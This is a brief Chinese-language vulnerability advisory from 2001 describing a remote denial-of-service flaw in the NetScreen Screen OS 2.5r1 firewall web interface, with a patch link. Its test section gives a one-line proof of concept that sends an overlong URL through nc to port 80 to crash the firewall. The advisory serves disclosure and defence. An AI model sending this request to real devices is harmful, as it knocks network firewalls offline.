NetScreen Firewall存在拒绝服务攻击发布时间:2001-01-10 更新时间:2001-01-10 严重程度:中 威胁程度:远程拒绝服务 错误类型:设计错误 利用方式:服务器模式 受影响系统 NetScreen Screen OS 2.5r1详细描述 Netscreen是一个网络防火墙可以用来安全的防止入侵和多种类型的攻击,NETSCREEN有一个WEB管理接口(WebUI)可以用来配置和设置防火墙。但对默认端口80请求一不正常超长的URL到WEBUI就会导致防火墙崩溃。 测试代码 $echo -e "GET /`perl -e 'print "A"x1220'` HTTP/1.0\n\n"|nc= netscreen_firewall 80 解决方案 采用如下补丁: http://www.netscreen.com/support/updates.html 相关信息 |
